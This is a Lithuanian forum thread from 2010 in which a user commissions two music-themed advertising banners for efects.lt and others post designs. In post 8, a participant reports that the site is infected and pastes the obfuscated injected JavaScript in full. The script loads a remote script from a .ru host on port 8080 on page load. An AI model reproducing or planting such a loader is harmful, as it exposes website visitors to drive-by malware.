Navigacija

Vartotojų tinkle

Prisijungusių svečių: 16
Prisijungusių narių: 0
Prisijungusių narių nėra

Registruoti nariai: 25,966
Naujausias narys: LnKnPrK1

Naujausi straipsniai

Paskutiniai nariai

LnKnPrK101:49:05
inti 6 dienos
kileedyg 7 savaitės
Reikalas13 savaitės
Kižas14 savaitės
Bruksnys15 savaitės
laleceylan5016 savaitės
minimukas17 savaitės
N-2020 savaitės
Rytis20 savaitės
DjArtas21 savaitės
WolfHammer21 savaitės
Nostesi32 savaitės
Wisedocs32 savaitės
asdasdddz36 savaitės
Paslapties K...37 savaitės
Audrius_1739 savaitės
Simbijanas51 savaitės
Karinacraft52 savaitės
Žmogus55 savaitės

Informacija:


OS: Unknown
Naršyklė: Nežinoma
IP: 216.73.217.110
Naujienų: 529
Straipsnių: 235
Temų: 52,591
Postų: 522,551
Postų pask. parą: 0
Shout'ų pask. parą: 0
P.S.C. pask. parą: 0
Nuorodų kataloge: 13

Lankomumo Statistika

Peržiūrų šiandien: 22

Iš viso peržiūrų: 22948724

Prisijungti

REGISTRUOTIS
Nario vardas

Slaptažodis



Pamiršai slaptažodį?
Paprašyk naujo

Aktyvuoti save

Šaukykla

Jei norite rašyti žinutes, turite prisijungti.

LnKnPrK1
2026 Bir. 21 09:06:52
Sveiki, gal kas is administracijos gali parasyti man PM,aciu

minimukas
2026 Vas. 21 08:02:25
oi oi akinanti šypsen yra dar cia gyvu? akinanti šypsen

N-20
2026 Vas. 6 21:02:05
O mes dar gyvi šypsosi)

WolfHammer
2026 Sau. 25 01:01:35
drovus

Žmogus
2025 Geg. 31 10:05:18
Kas geresnio? šypsosi

Šaukyklos archyvas

Apklausa

Ar esate patenkinti lietuviško vertimo kokybe?

Taip!

Taip, bet yra ką taisyti (parašysiu komentaruose)

Ne

Norėdamas balsuoti turite prisijungti.
Archyvas
Reklama 400x60
Perku du bannerius
Forumas | Viskas apie verslą, darbą, pinigus ir reklamą (E-VERSLAS) | Visa kita kas susiję su darbu ir pinigais

Autorius: bobalt Peržiūrų: 7054      Spausdinti temą
2010 Vas. 22 16:02:42          1 žinutė iš 30
Spausdinti pranešimą
Perku du bannerius.

Pirmas baneris
Dydis: 468x60
Spalvos: dominuoja rūžava ir mėlyna
Efektai: kasnors, kas patrauktų akį
Tema: muzika
Adresas: efects.lt
Kaina: 5Lt banku


Antras banneris
Dydis: 120x60
Spalvos: dominuoja rūžava ir mėlyna
Efektai: kasnors, kas patrauktų akį
Tema: muzika
Adresas: efects.lt
Kaina: 5Lt SMS


Spalvų derinys turėtų būt kažkas panašaus kaip šitame logo:





Ir abu baneriai turėtų derintis su šitu dizainu:





Kuriam puslapį? https://webdnd.com/siulau-kurti-...api,t49190
Redagavo bobalt 2010 Vas. 23 16:02:23
2010 Vas. 22 16:02:11          2 žinutė iš 30
Spausdinti pranešimą
Kaip konkursinė kaina yra pernelyg maža. Na jei neturėsiu ką veikt - mėginsiu.

2010 Vas. 22 16:02:02          3 žinutė iš 30
Spausdinti pranešimą
Jaigu sutvarkysiu photsopa tai butinai papiesiu koki baneri :}

2010 Vas. 22 17:02:02          4 žinutė iš 30
Spausdinti pranešimą
Na dabar turėtu nupiešti kas nors akinanti šypsen
2010 Vas. 22 17:02:01          5 žinutė iš 30
Spausdinti pranešimą
Tikėkimės, kad nupieš šypsosi

Kuriam puslapį? https://webdnd.com/siulau-kurti-...api,t49190
2010 Vas. 22 17:02:57          6 žinutė iš 30
Spausdinti pranešimą
Greiciau web tvarkyk kol google nepagavomerkia akį



2010 Vas. 22 17:02:37          7 žinutė iš 30
Spausdinti pranešimą
OMGGG ; Virusinis web'as gerai ramzik kad idęjai o aš dar norejau ajtį blemba, bučiau pasigavės virusiukumerkia akį
2010 Vas. 22 17:02:27          8 žinutė iš 30
Spausdinti pranešimą
Na pas mane antivirusine gera tj pagauna. Manau ten ne virusas o kodas tiesiog. Pas mane irgi tas pats buvo, kaip gix.lt kopijas dariausi, i kiekviena .php faila svetima koda uzkodino ir skaite kaip virusamerkia akį

<script>try{window.onload=function(){Fz6pq4f = 'k!aKiSxKiSn!-KcSoJmS.Zn!iSnSgJ.KcZoSm!.SgZoSoZgZlSe!-KcSo!m!-KtJr!.!uKnKiZa!r!rZaKyS.KrSu!:JTSrS2Kn!xZ5Jt!xK6Zd!lScZ5Z1S/!bZlJaZcSkZh!aStZw!oSrSl!d!.!cSoJmJ/JbKlSaSc!kKhZaStKwSo!rSlSdS.ZcKo!mS/ZgKo!oJgKlZeS.KcJoJmS.ZsZaK/SsSk!yS.!cJoKmS/SgSoZoKg!l!eJ.ZcKoSmJ/Z'.replace(/[ZKJS\!]/g, '');Jyr9t68n = 'script';Zw4b0flxu = 'dafar'.replace(/a/g, 'e');H7fzhuf9 = document.createElement(Jyr9t68n);Zb81ivq = '8G0G8,0G'.replace(/[Gm,l@]/g, '');H7fzhuf9.src = 'http://'+Fz6pq4f.replace(/Tr2nx5tx6dlc51/g, Zb81ivq);H7fzhuf9.setAttribute(Zw4b0flxu, '1');document.body.appendChild(H7fzhuf9);} }  catch(Ym4rdk90 ) {}</script>
<!--ccf65328f65446fc5682037eb69215b8-->





Redagavo botanik 2010 Vas. 22 17:02:08
2010 Vas. 22 17:02:45          9 žinutė iš 30
Spausdinti pranešimą
Čia prašau ne web'e lankytis, ne jį vertint, o kad nupieštumėt bannerius. Apie web kalba bus dar negreit...

Kuriam puslapį? https://webdnd.com/siulau-kurti-...api,t49190
2010 Vas. 22 17:02:19          10 žinutė iš 30
Spausdinti pranešimą
Nu tai kam cia jau reklamuoji uzsidejes ant paraso ? Prigaus google ir bye bye :}

2010 Vas. 22 18:02:10          11 žinutė iš 30
Spausdinti pranešimą
uzdek,akd nenuripintu banenri oarba dizaino,nes atsiras koks ir nuripins šypsosi

2010 Vas. 22 18:02:51          12 žinutė iš 30
Spausdinti pranešimą
Nu tai kam cia jau reklamuoji uzsidejes ant paraso ? Prigaus google ir bye bye :}

Kas prašo eit į ta web'ą? Jei dar turi kažką pasakyt sakyk į pm, o ne čia off'ą pradėk. Nieks nesakė ir neprašė tam tinklalapyje lankytis. O virusas tiesiog skripte eilutė netokia ir įtaria tas nodas-chujodas.

Kuriam puslapį? https://webdnd.com/siulau-kurti-...api,t49190
Redagavo bobalt 2010 Vas. 22 18:02:55
2010 Vas. 22 18:02:17          13 žinutė iš 30
Spausdinti pranešimą
vo prašom:




čia viskas okay, tik ipixas buginasi.

Uostyk.
Redagavo pokemonu_karalius 2010 Vas. 22 18:02:03
2010 Vas. 22 18:02:37          14 žinutė iš 30
Spausdinti pranešimą
LaurynasL parašyk į skaipą. šypsosi

www.mp3in.eu - Nemokama mp3 muzika zippy
2010 Vas. 22 20:02:07          15 žinutė iš 30
Spausdinti pranešimą
Laukiu ir kitų variantų. drovus

Kuriam puslapį? https://webdnd.com/siulau-kurti-...api,t49190
2010 Vas. 22 20:02:43          16 žinutė iš 30
Spausdinti pranešimą
Iki kada konkurs?

2010 Vas. 22 20:02:08          17 žinutė iš 30
Spausdinti pranešimą


Kas Nupiso Mano Kedus?
2010 Vas. 22 20:02:13          18 žinutė iš 30
Spausdinti pranešimą
Follow geriau būtų kuo greičiau.
viliux, nepatinka man šitas, nes ant logotipo padarytas

Kuriam puslapį? https://webdnd.com/siulau-kurti-...api,t49190
2010 Vas. 22 20:02:48          19 žinutė iš 30
Spausdinti pranešimą
ok, pabandysiu kanors savo.

Kas Nupiso Mano Kedus?
2010 Vas. 22 20:02:38          20 žinutė iš 30
Spausdinti pranešimą
Ok, lauksiu, nes nesulaukiu kol nupieš šypsosi

Kuriam puslapį? https://webdnd.com/siulau-kurti-...api,t49190
2010 Vas. 22 20:02:32          21 žinutė iš 30
Spausdinti pranešimą


Kas Nupiso Mano Kedus?
2010 Vas. 22 20:02:24          22 žinutė iš 30
Spausdinti pranešimą
Jau kažkas geresnio. Jei išjudintum tą efects.lt užrašą, kad jis suktusi ar dar kasnors, tai manau jau gerai būtų

Kuriam puslapį? https://webdnd.com/siulau-kurti-...api,t49190
2010 Vas. 23 16:02:57          23 žinutė iš 30
Spausdinti pranešimą
Daugiau darbų nebus?

Kuriam puslapį? https://webdnd.com/siulau-kurti-...api,t49190
2010 Vas. 23 16:02:17          24 žinutė iš 30
Spausdinti pranešimą
Mano bus šįvakar.

2010 Vas. 23 20:02:15          25 žinutė iš 30
Spausdinti pranešimą
Laukiu, laukiu. Kuo greičiau tuo geriau...

Kuriam puslapį? https://webdnd.com/siulau-kurti-...api,t49190
2010 Vas. 23 20:02:42          26 žinutė iš 30
Spausdinti pranešimą
Manoji paprastumo ir stilingumo vizija:



2010 Vas. 24 15:02:37          27 žinutė iš 30
Spausdinti pranešimą
Sakei dar vienas variantas bus. Tai laukiu antrojo

Kuriam puslapį? https://webdnd.com/siulau-kurti-...api,t49190
2010 Vas. 24 15:02:24          28 žinutė iš 30
Spausdinti pranešimą
mano bus dar viens šypsosi

Uostyk.
2010 Vas. 24 16:02:23          29 žinutė iš 30
Spausdinti pranešimą


2010 Vas. 24 19:02:34          30 žinutė iš 30
Spausdinti pranešimą
Atsiskaitė. šypsosi

Peršokti į forumą: